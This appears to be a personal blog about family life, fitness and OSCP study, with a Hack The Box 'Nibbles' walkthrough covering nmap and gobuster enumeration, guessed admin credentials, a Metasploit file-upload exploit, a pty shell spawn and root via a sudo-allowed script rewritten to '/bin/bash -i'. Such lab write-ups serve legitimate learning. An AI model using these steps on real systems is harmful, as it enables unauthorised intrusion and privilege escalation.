Welcome to August.

While I am writing this, I am chilling in a hotel with my daughter, Mila, waiting for my wife and the little man, Andrew.  We are going to the beach for a week with my wife’s family, and it should be the bomb diggity (who says that?).


Look  at this house – I am super pumped to spend a week here.

That being set aside, what is going on… well, Mila and I spent two weeks at my mom’s place with Paul, and while it was comfortable there, mom and I no longer see eye to eye.  She wanted to bond with my daughter, but didn’t spend any time getting to her level.  Rather, she used her guilt tactics on my 5 year old to drag her to places she didn’t want to go.  It got so bad, that Mila would not be alone with my mom.  My mom and her husband are boomers who I don’t see eye to eye with politically, spiritually, and emotionally.  So we left early.  I couldn’t keep my daughter there any more.  I think we are going to take a break from spending any time together like holidays, etc..  I’d rather spend it with people that are warming, and just full of gratitude and appreciation.  I just don’t understand what she is living for.

Well, I am still vegan  except for the last couple of weeks, and I feel awful.  I got to get back on the bandwagon, do some running, and watch what I put in pie hole.  We’ll get back there.

As far as OSCP, I am losing it.  I can’t study right now as I am acting manager for my boss and things are insane.  It’s going to be nice to go back to my day job – I think I will pick back up OSCP studying in the AM.  I haven’t given up.

I still heart Illenium, Melodic Bass, Future Bass, Melodic Trap, all that music.

bye.

…and it’s April.

Yep, so I haven’t posted for a while.  Mainly because I have stuff to do and no one cares to read personal blog posts.  I most likely will keep things down to one or two personal posts a month.

So here’s #1 for April.  Yay!

So, what’s been going on?  Well, we are in the middle of the coronavirus lock-down so things have changed a bit.  We don’t venture too far from the house these days, eat in mostly, and spend a lot more time with the kiddos.

I have made it up to about 33 minutes of non-stop running, my 4 Miler got canceled, and now I am looking for motivation to keep running.  I think staying in shape and strong enough to not wear out quickly is enough motivation.

I am climbing the OSCP hill again with the new 2020 material.  No lab time yet – I am trying to get through the books first before I hit the labs.

Orthodox Easter was yesterday.  We had the couple that we are sharing a nanny with over and we did an Easter egg hunt for Mila and her friend, Diego.

Mila’s birthday is tomorrow.  I can’t believe she is going to be five.

That’s all I got for now.  Going to see if I can get a run in.  Still waking up early ftw!

2019 is a wrap!

What happened this year to me?!?!

  • My wife and I introduced Andrew to the world.  Yay!
  • I attempted my OSCP.  I’ll keep going on this.  I really want this cert so bad.
  • I reignited my love for books.  Right now I am reading Talking to Strangers.  Malcolm Gladwell has really opened my eyes to crazy biases we as humans have on strangers.  Be kind to your fellow stranger, peeps.
  • I had a think week – inspired by my man, Bill Gates.  It showed me that I can, with a shit ton of will and time, pass the OSCP.  But I should focus on my little man and my career at the moment.  So that is what I have decided to do.
  • Hung out with friends.  Brad and Kasia in some pretty fun cabins, got to know my co-workers outside of work a bit, and hung out with neighbors.
  • Volunteered with Bsides Charm city and DC and competed in Pros vs. Joes.  I felt much more comfortable with the competition this year than last year.
  • I went camping with my daughter at Bull Run Campgrounds.  It was really fun!  I think we will do this every year, for sure
  • Traveled to Montreal and Mendoza with the family!  Both were awesome experiences and we had a great time.  Montreal more than Mendoza, but both of them the whole family was together and that was really nice
  • Went to NYC and Baltimore for work.  Nothing too far away this year.  I think RSA in San Francisco is on the docket for next year.

So… what are my new year’s resolutions?

  • I am going to go vegan in January.   A little kid and his mom in DC convinced me.  I am also really unhealthy weight wise and I think trying vegan for not only the health benefits but respecting the planet, animals, and myself needs to be in order.
  • Meditate more.  I love meditation and it helps.  Even if it’s non-guided, I pledge to spend four days a week meditating.   Even if its for 5 min.
  • Focus on work for the long stretches.  I have some days where I have hours at a time to myself.    These times, I need to plan out what my goal is that day and do a Pomodoro for at least 2 hours (4 rounds).  This will keep me in step and not so worried about those big projects.
  • Be more extroverted.  I ruminate about saying the wrong thing, or not speaking up so I just don’t.  Then when I have to, it’s bad for me, but really, not all that bad in hindsight.  When I was a teenager, I thrived on relationships.  I need to be better at reaching out to people and saying hi.  We all need friends.
  • Couch to 5k.  Finish it.  I don’t want to put any more barriers around that other than I think if I run a routine three times a week, that should do it.  Once I finish out the program, sign up for a 5k and stay in shape for it.

Okay, that is it, people.  See you in 2020!!

Traverxec on HTB!

Yay!  I got another easy active box.  I am learning a lot about certain services and some privilege escalation.  It’s fun.  I am officially a script kiddie on hack the box.  haha

Well, back to work.

Root. On an active HTB. Woot!

Okay, so through working at the box for the most of yesterday and this morning, I friggen got user and root flags for Postman on HTB.  I am not gonna lie, I did reach out for a push or two through the HTB Discord Channel, but no major hints were given, and through a bit of perseverance, I did it. Yay!  Upwards and Onwards!

Anyone who is in this field, wow.  There is so much to learn that I don’t know, and it’s amazing to me to get in the chats and on the web and pour over the articles, cracks, and loopholes that some of the brightest people in this field have come across.  It takes major perseverance and sometimes that quick trip to the bathroom for an ah-ha moment that leads you further down the victory hole.

I have also been listening to another book by Cal Newport – So Good They Can’t Ignore You.  I haven’t gotten too far in the book to quickly start picking up things that resonate with me and give me some clarity on how I need to look a bit more at what I am doing here.  I was always in the mindset of “learning to love what you do rather than following what you love”.  Cal iterated this in the book by basically throwing shade on people who follow their passion.  Simply being that many of us don’t know our passion or think we do, only to ask “is this really what I want out of life?”

I go back to work from Parental leave on Monday.  I haven’t been there for a while.  I want to bring about the “craftsman” mentality to my work – basically, it doesn’t matter what you do, just, as the words of Steve Martin – be so good they can’t ignore you.  I aspire to, every day, work towards this.  I have spent so much of my life caring about what people think.  I also have thought to myself – “I tried the OSCP once, so now I can add it to my resume and people will be lining up to ask me to come to be a pentester for them.”  I am so naive sometimes to myself.

I will stop caring so much about the meetings, the reflection of whether or not I have imposter syndrome, and just focus on the Deep Work of crafting myself into a better me, a more skilled me.  This is my modus operandi.  I will have two bars – one on getting better and more skilled at the policy/risk work I do for the government, and one on working at my technical competency through HTB/PentesterLab.  Then onto VHL, and then circle back to the OSCP, or maybe just get the eJPT.  (Why not?)

All this while adding exercise to my life (running in the AM with Sandy, the family dog, FTW) and being a good father/husband/trance addict.  Yeah, so I think Trance Junkie Podcast will have to wait till the kids are more independent and I can do simple things that don’t align with moving the bar forward for me.

I want to thank God and my wife for helping me find some clarity throughout this week.  Continuing to meditate and practice will help me move myself to where I want to be in a year.  What does that look like?  Well, it’s most likely not an OSCP cert, but it is someone who has moved the bar significantly closer to that cert, someone who is more confident at his job, and someone who continues to be amazed at the existence of his children.

My Co-op Work with CFMS

A couple of weeks ago, I was recognized in the Christian Family Montessori School’s Wednesday envelope for helping the school with their computers, printers, and network.

CFMS has a parent co-op to help keep the costs of school down. I get to make sure things are running smooth. Such as:

  • Activating network ports
  • Securing their passwords effectively (.xls -> LastPass)
  • Getting the main printer to work on Mac, Win, and Chromebooks
  • Cleaning up old computers so they are able to run quicker
  • Migrating users from one computer to another
  • Migrating the school email to Gsuite, porting over old email
  • Ensuring connectivity to shared drives

It has been nice to sometimes reflect on the little things such as helping with basic IT that makes me feel like I know some things as I push forward to learn more in my PenTesting journey.

Hack The Box :: Nibbles Walk-through

Priv esc through me for a loop on this one

This is a small win for me. It’s a retired box so there are a lot of walk-throughs on this one already. The user flag wasn’t too hard to get (minus simply guessing the credentials). It was escalating myself to root that took a while. The reason for this is that out of all the walk-throughs, none of the privesc could be replicated. I thought perhaps I could help by showing what I did, and if you somehow cross the web with the same issue, that this might be a crumb for you to push through.

First, I ran nmap on the target. I chose to be verbose on everything as my connection to the web is pretty poor at the moment.

nmap -sC -sV -oA initial -vvv 10.10.10.75
port 80 and 22

Looks like port 80 and 22 are open. So let’s mosey to http://10.10.10.75/.

Looking at the code, I found /nibbleblog/ as a path in the URL

Let’s go there.

So, generally, I would either run a nikto scan or gobuster. Let’s do a gobuster and see if there are any interesting findings.

gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -x php -u http://10.10.10.75/nibbleblog/ -t 75
…go go gobuster!

Well, http://10.10.10.75/nibbleblog/admin.php looks super interesting.

Here is where there is an enumeration jump. If you go back to the blog, you will see a link for the atom feed: http://10.10.10.75/nibbleblog/feed.php. The title is nibbles. Also, looking at http://10.10.10.75/nibbleblog/content/private/users.xml shows admin as a user. So yah, play with that and you get the following:

Username: admin
Password: nibbles

I started looking for exploits at this point, and it looks like the best one requires metasploit: https://www.exploit-db.com/exploits/38489. So let’s do it.

root@kali:~# msfconsole

------SNIP--------

       =[ metasploit v5.0.58-dev                          ]
+ -- --=[ 1936 exploits - 1082 auxiliary - 333 post       ]
+ -- --=[ 556 payloads - 45 encoders - 10 nops            ]
+ -- --=[ 7 evasion                                       ]

msf5 > search nibbleblog

Matching Modules
================

   #  Name                                       Disclosure Date  Rank       Check  Description
   -  ----                                       ---------------  ----       -----  -----------
   0  exploit/multi/http/nibbleblog_file_upload  2015-09-01       excellent  Yes    Nibbleblog File Upload Vulnerability

Let’s use that module.

msf5 > use exploit/multi/http/nibbleblog_file_upload 

Set all the required options:

and send.

damn it feels good to get meterpreter…

drop into shell…

meterpreter > shell
Process 2902 created.
Channel 0 created.
id 
uid=1001(nibbler) gid=1001(nibbler) groups=1001(nibbler)
pwd
/var/www/html/nibbleblog/content/private/plugins/my_image

Let’s spawn a TTY shell using the following command:

python3 -c "import pty; pty.spawn('/bin/bash')"

Let’s go ahead and get the user.txt flag!

nibbler@Nibbles:/var/www/html/nibbleblog/content/private/plugins/my_image$ cat /home/nibbler/user.txt
<ml/nibbleblog/content/private/plugins/my_image$ cat /home/nibbler/user.txt

Now, Privesc. This was the hardest thing and took me a while to get it down. But finally, this article did me good, and I was able to work it out. One of the first things is figure out is if you have any files that you can invoke as root. So you do that by calling the command:

sudo -l

so we can run /home/nibbler/personal/stuff/monitor.sh as root. Going into /home/nibbler, you are going to want to unzip personal.zip to get that monitor.sh file. Now we need to modify the monitor.sh file to have the following code:

#!/bin/bash
/bin/bash -i

You can do this by either forwarding it to the end of the text file, or uploading the file using netcat and overwrite it, or get back to meterpreter and upload the file. Make sure you make the file executable (chmod +x monitor.sh)

Then just run the following command:

nibbler@Nibbles:/home/nibbler$ sudo ./monitor.sh
I am root!

And there we go. Now to get the flag…

cat /root/root.txt

I thoroughly enjoyed this box. Please let me know this was helpful to you by DMing me on twitter @Mova. Thanks!

Update with a path forward…

For the last few days of parental leave, I will have some opportunity to reflect and decide if I would like to continue my OSCP journey. As of right now, the answer is yes. If others have done it, why not me? I think it’s pretty common to take a test, and if you fail it, flail around a bit before getting your grounding. I feel like I have regained some grounding and have a path forward. There are a few rocks on the path, but it’s a path none the less.

I have 6 days – between now and Saturday where I will have some time to myself to do some deep work and deep thinking about my professional competency. I am going to not only use this time to reflect on that but also do some minimal fasting, exercising prayer, and meditation. I have a few habits that I need to place a stake in the ground on (little things) and work on my path forward with studying. I am inspired to do this through Bill Gate’s think-weeks, and also a book I listened to called “Deep Work: Rules for Focused Success in a Distracted World” by Cal Newport. Cal is a computer science teacher at Georgetown University, and he book spoke loads to me.

I have really been thinking about the amount of time that I take studying around OSCP. Things like Bash, Python, Linux, and Powershell. I think if I do that, I will never get to the actual pen-testing. I needed something structured, and just doing Hack the Box/VulnHub wasn’t structured.

Step in PentesterLab. It’s 30 bucks a month and structured. I really like the fact that there is a public profile where I can show the certs I managed to get along the way.

Woot! It’s some direction!

I read a bit about it, and even though it’s a bit more web app pen-testing than OSCP which does cover web pen-testing. but also really focuses on network pen-testing, I really like it. I have done the intro labs and working through *nix currently. To pull in more network pen-testing and the full methodology, I plan on doing a retired HTB machine walkthrough and an active machine on HTB daily – till Sat. I will have to re-assess once I am back at work and don’t have as much time to myself.

I have also been using this blog more like an emotional dump of my studying. This blog really was more for the technical aspects that I was working through on the OSCP, so I will gear it more to that moving forward. No one really cares how I feel all the time. 😛

Once and if I pull some substantial time into PentesterLab and HTB, then we’ll chat about the OSCP.

On to the work!

I feel so far from getting my OSCP… just a little burnt

I have been trying to study, but it’s been rough. My main priority has been my son, and that I think is a good thing. But right now, I have no work responsibility, and I am having a hard time working deep and smart. I am flailing around like a fish out of water.

I am thinking about working on the basics, but it’s just so rough getting through it. I want the sexy stuff, like working on a box all the way through to root. So I figured I would work on the basics for an hour and then do a VulnHub or a HTB… but it’s not working. I can’t think straight. I think I am a bit burnt out.

So I did BsidesDC, and i played in ProsvJoes, and I have to say, that I felt much better about it than I did last year….

I think I really still want this cert. Pressing forward, I will work on a VulnHub first and then dig into a basic again. I also need to think about when I will start the labs again. Maybe after things quiet down a bit from coming back to work.